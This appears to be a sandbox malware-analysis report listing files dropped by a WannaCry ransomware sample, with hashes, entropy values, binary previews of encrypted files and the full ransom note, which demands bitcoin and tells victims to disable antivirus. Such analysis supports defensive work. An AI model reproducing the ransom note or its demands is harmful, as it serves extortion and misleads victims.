Preview:	WANACRY!......(NV.}(..N.~-=...g{=..N.....o.':.,.i$,.8....u.[..z.fy"<...S....!..]h..T...v...C........=.q.l\...v....L.Inrah.!.u.........<N.....}Dn..x.{.%.?B .2..L......=...Z.:...46..44....P~..GY..k..^...z..s........'...+.0.U.n.....}y..F?]..y=.....&...=.,Sn..2...............N....F[}....i%9p.fr..x.........;..o(..dJ.I?X.~.>7.j......Hk...wM..<....w.C2..a...uZ.1.>n..m.fr2v.../...z...M..... m....{.4Mn...n,+..c@...7....4.g.3.......X.....@k('L.....c. A......X.T.....{....X...h......x.+.w..;..Ib...xq.....Dp..]..u........)....e+Xw....Ft..J...l._.5V..3._..I1..n.2_lT....rb...<j.6e<..I.S...@.H.......q...v..S .e/=s.K....pto...d{gU......<\.6..Hr3z...R.$...\|...g.S....>?.g..#.w..1-.q.......Qg...6..G..w...... ^K..l..6`gak....f..4.....!....? .....&..dW.tgQC..H7..D.F.....D~.lY5.,..B.9!D.<....S.y...b.2.3\|.uD.0c.... .-_V.kX%...UI%bL...C...8.(=-1u....UE..A..1..,........."y.w!....#C..S...h...."./...\|....%.+...Q..Hr..*.m........7..........x`.c....i{.+j..<.....q.wS.....[..HC..

C:\ProgramData\Intel\GCC\gcc_svc_log_2023-05-25.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	7.883478873650741
Encrypted:	false
SSDEEP:	48:bkjpkrm+a4etwDMtnLfAySrR9SjE1hAjl9GI:ojua+LBQtjAycXuE12GI
MD5:	5060DEBEDE9F2AB6FF74BD714BD2B05F
SHA1:	225DDC7849611CE828FE5948E9AEE9116AABC4EA
SHA-256:	F497101E53D340AD6CDC7F1386E252E98760546B1375F8C97C7D71F94E19D02A
SHA-512:	12EA3B46E555AD832437420B672CBD0CBE0E170FF49847804F8E018C5682407A16CC8391E8AD76B93A52633BA21322F06059BD9A0F89F5CD3442AC1B8BEEAC94
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......i]...N.\.?.g...z@[..=.......<X..=%.6c.~.5.......:.;..F....b.L..l..Wn....X.v{.I..V.........pM<j.....zK>.ml..R...i..jQ3.E.....=...w'4.\|.py..S.....k:.....9.B...Iu.).OP[.........m...v.2...!X......w..p....\|}.l..Q:...@qcsO..5...:.vD!-..........#........G.w+.J:?.^p.v.p<.jp.9.r....{S.v......^....a)...y4E..5.....B.Q..t8,..@...P.$).....FsBW>.$.Y.>v.UBG....).lV.g.1.jRZ...P{P..[..[..0...Ie.k.V.{{....I'..Wh.Sq...\|. (oW..S....Z....G.......\|s....&$NF...5@.>(....2..4.w..T5`tXJ.p..&......3..C..Q.)1.....H....n..>.((...`@[Z)..x.pK..DH.]....{H<.\|.a.&j.4.\3...E.!...w....C..YH..c........uUt...1\|....._'Z..<.[8.......a.......$.[dC.d.k.`;..[h.....SI..!X....k...+.T.Y.^.b.x...:.8+.......3.a.%....G....o..5....A...>V...e...g-d...9.0.C.T#:f.~+..QD.qJ.Y.,....p.t..C.?A4.../.5.i..PZ.].H0.....PN3.p<s.f^.n.....V;T.?.^.nu..->.6...........8.o.^......t.8.r../64%D...=.....'[5(l*...f.or..tP........v....g....n..+'..t.j....5...Y:.N.....?7..b_z...E....}....

C:\ProgramData\Intel\GCC\gcc_svc_log_2023-05-26.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5912
Entropy (8bit):	7.9703728862125045
Encrypted:	false
SSDEEP:	96:o+2HJfkOUazcfVOzBJ624nXp64I6v0CWaWSJisCDt4qtHBPQiYU8LyGr8u2LRbTw:R2ttUazcfVOzBJh404InCWaWSJiLxBfE
MD5:	4BCA4895F79F0C9B8FF074989A461E0E
SHA1:	60B79068B1E8A61089A7DF183C22F1BD698FC2FE
SHA-256:	CF5F11B0D9291498F5E80E00F8D86963844A7DB508FA2E1FBBB01503442E6615
SHA-512:	91EAC84BE1F0D8295F2EC35699A1C9B31970B33B01914024B5762ED1095EF3090875EFD897C05F3E29445FA4AB68376D2B24395D7D1C722520645BEF0D591398
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......c.l.`V...B...b..r...:..5..{RM Gr.L....r.>..E.....)o`..L.%.1..?..m.....b~.2.....e.;..4..I.xOUX..g...A....=.k....X6.........Qc.l..b..lT.~........Qj.....iA...9K.OBJ:L.L.I.....Y...:@../......*c..o.%.z..R.i.....-...nph..^...3.mg..^..s..p,m.............2+.}..#zo.m.3......0./..4.SHf..:.\|.2...........O..0BD...@../.L..K"..".(c..CM..d.. ..h.......V..X..)....u........y...E....../......p...\..L.jQ...u}_..~..Enu.....5p....}..v.-v.N2G.$.r..IA..!.. ........q.j......!...B.7S..V3..=q...6.C.{I..s...X...h...e..>..^.fl.".A...y...q.5.....L....A.v.tX2.m91..q.9....D.LJ.V+..9e-..<...g!M.%....^...C..!(.M`1<.jx.?..a.\S'.&O....y...@-..w...4H.1.C.\t..f9....^.@9..y ..H.{.!.....G..5.\.....W.s.C..Trq`..X.3=.k.U....IR..>....S7m.....H.4f.%..J.-...B.x.......-...u...<[......{3S.X.j.{.yjm.c.6..Z.^... .$<.1.'Y.8....Rg..r.~mFn...A...-b+...I$J.Z..O...)..,g...R.W.)h.V.....K.3...R.EK..DT.._..E.&g8...Jqr..Pg$..9o....;....[...C....F.($...$..1D{....D..s...J

C:\ProgramData\Intel\GCC\gcc_svc_log_2023-05-30.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1032
Entropy (8bit):	7.793940816665743
Encrypted:	false
SSDEEP:	24:bkYuwXzXEXDq9PCKWFyVmHh6Ey6jU/D5yJzNtPUuo3h09o:bk37kmHyrEJznPUP3h09o
MD5:	FD2DB8158B462B7BC78D13C78D1B8710
SHA1:	1C7AE4AA7536E9BC63A9382044B61C2FE6CCDDB7
SHA-256:	5B92CBA7E5DFBF4D523B5A583EA0BEB3AE3A230A6ABE66158498469BB11016BF
SHA-512:	A5C8BE01DB9897675C7433F5B466924DC0F51DF52CB2D2B984E8AC0923DC09B1E107ACFEAE1E38056855B4B577CF400375C97C4A7BE66C48936EA07B6A3D1B99
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......I..$Yc..U.W%.%7.....\Qc...pr8.sN.~';.DG...\|..+{....o........~.j.=B..P.uk......O]...\|..C..=S....<...........i..t8...... 1....K..1..n.....w.d..c..7.Q........e.e( `\.....w.!...r.U]r.....\.B\|......q.K<.t...L.....?.t.+....y.A.T...8...t....m..............u.a...P.3_. Y.z...fq......?I.18..q.y.z...q..?..... .#.)..].....m.;.P.=.y...pI ...B.S\|V.1....T.B0.i..Y....[9q.e&0..g..1q..Ac...v...jn.S..z....sW.Q..'U....\.....;.=O..;..:..D.>.7.......)bmhD....,......{..y...A.....n.=...ht.1..3...u..W..q....z.F.$..%.Y.s..[.rk..,a#..%.c..B...Z..:.6;.&.L:.u&%.bi....O..bQq.P>1U..FGC.F..O6. .3..S-.....24..>..!p...2..S.....`Fa../P.X.q.....suH.6.....k$......Jv.::..Yp~...........2...j&..@J..{..z.....D..r..R.^....E..Y.R....8.7............Q.B..V..G...).c....(.L.D-u.....cd$V.8.K...D.JBho....:S..U.Y?.....'.{.r5.Qs.....T..?zxzR.....^T..].)..nV:.1&..4......._i.<.HPhw...........1..6.q7.G..&.D);..P....d............\|.RS..\.,....=.1.1..ID3.........B2.......

C:\ProgramData\Intel\GCC\gcc_svc_log_2023-08-05.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4264
Entropy (8bit):	7.953578305063991
Encrypted:	false
SSDEEP:	96:o+yGTXBeelsB5Iebizu3iYZ2Z0HMlJcaz106zKRWEqrSw:qGj8ssZizQZ7HoJpz1KRlq+w
MD5:	156F205F2D45E70E86E5058A15852E8D
SHA1:	4894B1719E7EBD23291E340A0720D41B9DC2995C
SHA-256:	0FF3BD617B7D07B51667904208A9DB6379BB125AFBA20F763FC2AFD3AE3A928D
SHA-512:	8890CB1C3411BA89E942B91E968F6531199082A9852664BBB01A4A9CC0FBAAA1F8C30E9425AC6C795F4D4BE9E76D394F0136A87B686711082B3B01C2F21D9CB9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Z............3HQ.J.9S.um@n0....-..T....'AB...`).\|o...?l..Z..l@....L.e.o...P\.j.A..;"..%2......&y..^..EB.t=.6d..h..z..5g.}5q.......c.......i.p.'.^@I!.\|_.F._V.<..`........Uwa7.9...l#.]..n..F3P:.e.c!..B.$...G...-N..U.`..%.O.!....G...>z......_!..................s....p...,...(.v.c.GCj.2.b....O_@. [.N..K.{.......A..;...,..w4.J.%..6.9A{......;....u>...&.I. .w....n..j.l..1....p...9t...yEii...9y.,3.1nO.f..D.gs2...\|.;........54.@.K....y.29R.b...&p)] ...g.._-.....4.....A..*!#..-.O<t9F~Zt.YOy%..HX...O[b....d&......_..{.GQ...'..^.S.K..3r!`yB7.r.....bW.'.c.{...v..I!Cw..C...J8.....4.........#r.....v.Ut9M......p+H..c.T...(un...>..Hl..c..e...l.U...W.Ki......%.'........75.[....;..Xt.o.EV.1.K..M)T/..\|...{.=>.n.R....._JR2.e..fn?4VN. . .o/x.}#>...(r).......%..2...d....vR....E...O.5..<.....s.b....I...&)....\...x..;Bx....'...M...P.e.....hy...K.'.nc2...9...-v...~EOe..N]z`Y;.;..Fo...}...4..n......)..Z...~......Wx.Cuu....5....7....<.v..w...M..b..`A+.

C:\ProgramData\Intel\GCC\gcc_svc_log_2023-08-16.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1032
Entropy (8bit):	7.8090105905515514
Encrypted:	false
SSDEEP:	24:bkK7iX3CECMmP90qXUYKt4vHHIPL0fVXdnf2x5C5DIK6BU:bkKGX3CTVVXFKt4vigf1Ffm5ib62
MD5:	DBB30FDAB8B7D242FA97E3DD004EF324
SHA1:	42DD24B904481444074C02F2C0F81A95531E93B3
SHA-256:	E8CDCE97254E292D606E1F67E205B5DCC2E1912FA883D191456DC62DCC61CB60
SHA-512:	42C6C918E3B5D78BB29A90E24B71F87AD1A10087E91AFEAB80EA6A0A1976A365CA71BE09A74A27AD994C0E550D1DB5FF093E6E0F7ADCE0A8D47D8D5D09AE8FF7
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.........p.-..~G....L.....E.<c....A...4.D.&...GL.>..A/\|.... .S.$,K@.ULk.....H:=.KC.r..-.....2n..V...........UW..3.m..q...7........(m.D..g....S......a....oE....._@..T..>...r.e....i.Q)...sB.`1.g...-..._...P.....M...i....h....O....bHF.c_.'.f.~.............K.......)w..coX.a..:`7M..aYvD.:t}@...mV....1\|W...,C7..3.V}..a..wgp.....rJ...oim8j...8...r..x.Z.6Hq3..J^x...K.P..p.cR..y..]..L?.....=.@sW..U.1f+...8i..xI'b,".../T[...y.F....n.k.d..2Rt...f.V.L..<..[..6....\|...A..J...^.........}.8....R..ny{.c.....%...w...y;.Lq......HTo...i.l~.^...........\|..^.g.a...7....Qs....gS<$*).\l..mK.:j.../.S;.E..S..v#........H/.uU....0e.4.t2.c.`..z3.Z.f...~.!..=a.P-......0.5.F.r......Q#.......$cM....f!.L......,.k.8J..x3.?....&..u.q.....]i....x.6.@'.0}...;.Y..j.%..$...s..........x...O...X....{...%..v..MKs..7z..$\|..L..f.P7t..X.2. ...!~+..+.M....m......qF.C..}..6....&..iCW?.vm.~2y.t0.o.......7W.az..E..e.w.7HD......G[....$.......Q%v.R...H.......;.....

C:\ProgramData\Microsoft\AppV\Setup\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\AppV\Setup\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5256
Entropy (8bit):	7.965735722600884
Encrypted:	false
SSDEEP:	96:oPrmkdsMkWEyFUi7vXCytBn0VggTfd2Gpz7ovchGqYnjbOgFteGh:Umk/EymWXJEVzdKvPXOIeC
MD5:	3BCC3780A8E3D226968C85996BC74104
SHA1:	796505588CF22E70E26023001CF84FB6C7689396
SHA-256:	1A5C7F7C88222B86A2DEB54AD42699EDF6010A70CA17B9E49FF6940B78372AE5
SHA-512:	3E111DD39F9965C067F5099647E4CDA9CEBBB27376A48713DE30426D62F30A32B7CDEED166360E91F3BA2FBED06DA9146603A4B9B6D040134C6A5138B03FC10E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...... "...F....TmML......`.m{..>....i4.....m2.SP.q....-.Y.....bk..F...a.....C<.....d......[..5..y....S...E.U".d.A .....H...........k....R...(.....Y.L.....k.(..]../F.....a.8.........V........F7..a.CwX....d.-Ar....zL<un..z;.........s1.Q....h...............^.6.CI>X.R.B.!..T...X5..,LH..v.............@.....r...)....=.bL.56'H!.z.I<.....CY..5\.QjWKxj1.....S..>.,...I.Wj.t._DR.\].3.....5.:.T.Yi)...\.ZI.h..Y...:....H...s.J;.`6...$=....7.b...g......z Xz+...m....1.{zb.....^Y..m.."9.}.v..,U[......=.....iJ...ac...5".f......v."..f..[...{....<\. ..0.K=...eX8...x..(.v ..MH.<..c :o..=.E..y...-..b....%....p...l@k7...$D.4..J4...,....>:..........x.......H..I...#..cw0........^.t......u.i...?.....:...+6..\...Xg.......xO~....OF."..+Cd.J.F\|o\|...;....J..W..6='5.M...Ly.b2....@.^.I.#<+L/.S.).p.G.w.. .S.]....R...hwn.b..&.~[uD.z]a....C....l.Wl$(....w.%.HQPv;...p.z.z..2....L.<...6."h.&...Kg.T...j..Q..V.$..I....M~.B-b...[._...D..;k;e..[..mQm\|..K.e..1.

C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\en-us.16\stream.x64.en-us.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	548472
Entropy (8bit):	7.999704531454721
Encrypted:	true
SSDEEP:	12288:GIsr6AnEkgZngydNH1NAEZ7ZTZUd/Q1CP6sRXVt9y1+jbuS7wmt:GDENZg0NbZ7ZSG1+hVt42qS7wY
MD5:	2DFB99DA20BC6120F945EF8EF9624424
SHA1:	AEB78F939EA9572402B0A46C508BE1F12D977AB0
SHA-256:	DA2E1CEC9C762B06D48349ADE352A13A51752E48F1EB3D5455AFB55D940AAD5D
SHA-512:	70F657A7C42E3B2CDDD3505853CA001D152A74B813BB056186A17F3AD01B23234641A6BF9E4EBCB2EE82DDBE3F88A4ADB4EC9DC88D6DB279B81FE7C64A318AA0
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........J..{......X.......?..Kp..4...U.....q.N..mGZ.....S...."e.P....n....@..N>J......."%......ND......h.....L.F..`_g.-O....5.C8<E..+.N.\|.@....jYl..a)/E.ze.,q....=6.X..$..y.\.....,.ZVP.0S....vY.6....,E..C.0+........dD.0.* $..,.c.oP..5"..J..g1?.C..l.0X....Q]......zBQ..r@x..}...<{&e....[G.c.z...I.-..j........D..9.H.q.......i..%0W....10...:..L....4_4.F..'...A..W!..e.%..3..Zw.i...{.`v....Ah>.(.{<d..R.vC....H..c.M.~+.......SG.6DH,.U.....M...c^.w..l.s.......u.'..TF.....{.A. Po:..%Qu.:.....>....W....v.H.u\.t.S.......c._....0.VNi.4,.p.O..$.....J.....hxH/.aU..b0).......q...Z.3U..../a.L.J:.A..{?.V..1b."2S1.d.&.... ?.........n.h... N........T....24.pea..[..h..ypg.x..E.."S....l....%...0.(...v..R...6>..\.W......8.R....../.HI...[:>..S.G..Y..`....o.....u...CL....v]......}.,.....D/..LE.^.4..==-S...@R+)0{..Y...L.1.....!.....~......Y.}.....qZ.T/.2.x.s+..2.T..k..).G..]J.&....=z.!E.....%sq..8.........dQ9..BM5xC...6...\.I.^.'..O...}..8..9..6.09.j@.<.q.9

C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\x-none.16\stream.x64.x-none.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2972600
Entropy (8bit):	7.999936217621953
Encrypted:	true
SSDEEP:	49152:eB5IyA+vV9cJhmUtkY8CIXnyDOwF85uF/O48S3EoUKmzLna+LScXlQ0Kd80gz1vd:ejBA+vPS7qY1gnHwF85uF0naslmgvd
MD5:	1CF8895A390D00D68C3001C240EF81B1
SHA1:	7BAE9205178E0639DDD89D1EFB11A24FC1AE7D1F
SHA-256:	9A6B5FA6F8DFCD5820099F31BCE154C4335EF18702B412FF8610539DECDB0BEB
SHA-512:	DAC90EBCD349AF7A06C4D2C15F6F4F8BD286CE492BC9E5C07384460AD0EB10046CD31BF84C079B89C9703AD74D394E6FFD66C7CC7B7190CF641FF21DAC0CE704
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....b.tJ....v.(..Q...\d..7<.u...F.B....Y..7..g...o..L....U...V.Y.1=/..e}.>..b.8.\|....B^..X.dTs.BO.....%.g.N.~(.~.,.9....g...z<<....<...S..n.G.`.9.w...eS8\|B......uu.......Ns.`:j.v..nI...2.,M.01.......>......[:.e.+I..f..".b......\|......=..N...'..7.....Z-........P.z)k.b.0..9...Y.?........L.....4.Bfsw.?...%.y.jN..FS....8..{Nl..G..W..4eE.-s.n%......F.>.}..V...I.VB`..\..bh....P.X..5D.:....5..Y.......g..c%?..>~.k..\!..GD2.`.&k..\|r....FJ=......o.2\|xv..q.I....S..B1XT-.\ua{.4.2..f.H...J..zL%...m..NO..0.......?e..-6.6!.....5.o......p~..9.p.>q...X"..i.$..f.?.!..n....W..O..8.c9.voa.^y1..S......$...Z~.M..I.:..M.T....H...ug.p\.C.4..\|.K.<.Z.V"K.Q..........\|m.....R..>...sNH\.e..Re....3...$.s>.H..}....0...:>,...V4a....[6.E........c.."..~..h..+tY.<...Gl..].a.%9....3I.[....S..........n...>.n.>]?.e.`/...H.0E.XFT....qe...d....`.....>bL:.pq.?.GyHB,."a7...!.....p.0...$...tz.../{..@...7p.0..<o....#.'......^......s.o.~..F.....U\Rv...g5s..f..r.D........

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	130040
Entropy (8bit):	7.998506112633817
Encrypted:	true
SSDEEP:	3072:LkVFA2mMLmkCHTmN0rF5NVsdT/BWR2WDgCb+Za4DHaBD:LKBNOhs1J6zDEZaQWD
MD5:	CB60976DC3B2E0570730917015333F56
SHA1:	BA302857ECF3D601D97E0D1A82A1F1C731456E25
SHA-256:	EC4A2FBD0CCCE0B0D0BECBD5F40A7F78826782B48D594FF4EAA5B697C661201D
SHA-512:	4EA142771F2420AB08D94DF34FD52ADD6CCCA2CEA88CFFA581D5D51B3F1FD090B0B2D3A9A551479CE19FC41F437A751AB698041879012DF3E55E81A471F2A059
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....F.....q...W-Z.eA.P..c...r.......;..=HP\|.ZB&...\.G...."..>...l..f>.W.9x_...u:.Z.......[.1..d....].}d.._..n....L^..)..@.F.p....3.k.o/...@2/Az.~....J...o....F..!>w..v...Bb.._.#o.^0...C..!B..y:.0........Fa...&ZQ......P.a[....+.L...O...z.B7..............@.{..W.~...dQ~... ....w(o..a.6....E..{.3...Z.0.z(9..7.<.~#3..Mx.....5x.rn.1.5..;.6B#..E.f.......C........Y"...6.0.%.4.x.y.^.b'..A.......f...{._.a.....\.w..........."B......{lPi..n.2T..6n.....c.v:.M..........W..@..$Li..j.....x...D"K..'.X..-..;.z...}F.$..Wf.,.=..jA..QU.d....H.j.4}...!.......j7..KS.m.C........A.+...-l..I.vw^ty(.t..z.1....E'\|.....0xC..J.....u...cdN./5..1AlY....$...&...c.....0...6T.l...[{..U0..%....y..C........ey..o....J....^R..w.q.aW..:8...?&...+{.....w...../.<br...z\.q...a.....q...F.`0..(.yT.t.E9h<X.4..N7.!...b....Z.~EG.XP...yA...........<.>DTI?..W.....)..W.'.p...=N~m2E.1r.X..=.$...aX......A.u..=#Z<...jU?..T.......NvE..RuQ.......XZ.....&.zmt...]..cF.w.....

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	44776
Entropy (8bit):	7.996102836103304
Encrypted:	true
SSDEEP:	768:eVoslKgBWo0ZBiT/iOrATXpuHy8c0j7sYX2P4o3NCSvsk6fOYafmkOYU:eVdTso0ZIT/iwEpsyaBXw4odCSklfOY5
MD5:	A65C99FDE9DE43D6A9493EC15CB7E5E7
SHA1:	58C0FBDD542C8E982C5B75986514A3D856267C94
SHA-256:	FC930DBFD3E79B27B233F2198A519216687A02986CE715AF30CC6888F20047B1
SHA-512:	D2162B727105F407CE3A2BD289B591C5589BE09636341E071741E1D73EA6249FA248D34405B90D09C68DBE69487373B64BF1C1F0D5D57FEF3CDDED07FBC74749
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....)!......F......@..T.: ....ip..ri..nq....v_].Tb.c>..ql...rY.N.Y.....4Lf.E..I8^KZ..P{..4m.F...H.S.k.s.g}.<.]...9A.4....d.N.?}7(.!.I.f...[cW.e.`..w.n.#..hs.m.W..C.DA%..;_.~...(...yj...o.9d.?.-Q..o..z.Q....U.-y......#}..!.N.U....X...a..i...9PW#\|.................a.{RM...^...2.....Er.3..=....l.,..(#}..@]...q?..m.c..#BJv4..$...p4...v.N"...q_.v.>.\|.x...;e..+.n.3........T .......C.L..Gt.3F.C<.{P.....G....uY....v1b.\......-....J1.....^..F.Y..6\...p.zt.....l...N...T..9O@..5f.....0W`..;.?u....,....Nl.....d'T.'.?f...@.i5.T..>.tI..%.F...........b.......1e.2]ERY.Q..f......WN..."..BG.vD.(...f..l.)......./............S9\C.J.EB...Z.Bb...]Y.m........@8......g..1...A>..#.M.....8$.....IA.MBo.UL...D....tV.wW...-......bl......q.w$%.....}.s.A.b..<A....c...v....~..F.1..a..7@ .....U..V...g...3.#.y.b*.......}E..,\|S..7Rb.r!.i...ji.#.Y-.(........G....3.vj3..ZYP..u......j.iA.P.]Zq..........?.X....9".5..Z)..N..\|.S3.^]+...D...R.]...G.....{.W...+.T.

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	29160
Entropy (8bit):	7.994276151626231
Encrypted:	true
SSDEEP:	384:zz8zZH3qFC5jmqe1PPwL8Cc3nzcrbjMueTZrjsOb6z279WBRYETpuSA/CouTF3OI:z4H3EqeWq4bMxTfb6ymRhuSA/gTFWcau
MD5:	EB551A0B46C9CA7665779B7606303B3C
SHA1:	BDF702DCF73723F9B9ECBB18E1BA1394E0249C8A
SHA-256:	2C023938FD4CF1F7D7F598283386B9B3D67CD236AECF0A30F46D01A12D1EEA37
SHA-512:	255402F45109CBAFF013A5D166F45D75F5B7910538AD660463321C8556AA4969ED527749D801C041386335A3F6372DF03C0461D9A2145699F94D0F8CA209C88F
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....S.C.qK!.).._....{.>...z2...%.....aA...S.k..!.? l2.W..JV/k@.v......03.1sk.L.H......?..-...?..#:l.....=q.z....$.J...J1..Wp.x.W...,Q..8<W$....@..&.Q.j..F0>......Q...5....IK...~....iu..........VW.E...q[..c!/....1,..n.>.O.........8.....E.9.......W.[.....p.........R.Ci"..>w.8/...4!..3Fl.....5....5....,.G8..\.R.}.e..7&..n..@TT...~\|.n/...6.y...i.s.D)ci);...g7.F.)4...]....,..j.....8@.?...&...L9...]......+......y..D.S..i.......V......-d...~.t.I..M.tPF.!6cm..o..g..X3.......8..p>......U..../.......{\.4.s.L..&..j.M..X.g.HPU...m.M..B..3"..18.....#qS.....9I\|..7.:.i.Wv.......2.,.wo%.w.M.<..W.....T.@..dmw.}........`.Z\j...$}JW...6!..L/)\|.R...86k2 .4C....03G1.'...kpa.v.!I...F ..:A.\<.,........h.&o.n.<....."..P..\|.fX0.q ....D...;...dr9........w.].....pT...,....\S;..{.q..H..;...:]>..5a...I.......M{.l.lU[w..(..7.....g..9s.4.g.2.M...Z4y.M._..v........rf.2i.............Q..=.F.....h.....5.....i.Ciw.7*Q.O..- !oCHH.P..,C:.W$.bL./myK.@..L.$..5..J..z....r...YD.:...

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	39672
Entropy (8bit):	7.995196809031154
Encrypted:	true
SSDEEP:	768:yKDwZGBr7zN4C3d48Ep55ity8L5X0AfU7RIZHKVvRkHwiqdYaY+NHnX:24L+C5iHio7eUe8vRkH0dZHX
MD5:	C47CDEDBD7770FD13A2027B70C51EC39
SHA1:	90FC2A672A4EEF304E79A3BEE729943EA00EA787
SHA-256:	88593410A364CD5B769F80FEE9BE7AE23B60C1357861A6A3F10F3A13057F5E9D
SHA-512:	CF83DDD1B85725A72D2D30277837F89AA8D1A168EE8391683CAB7DA2C31F8D2D9F5EA80196490D35003A6D2CC4D51750B8EE5F5A37A8E028E0B7E771F08CBC21
Malicious:	true
Reputation:	unknown
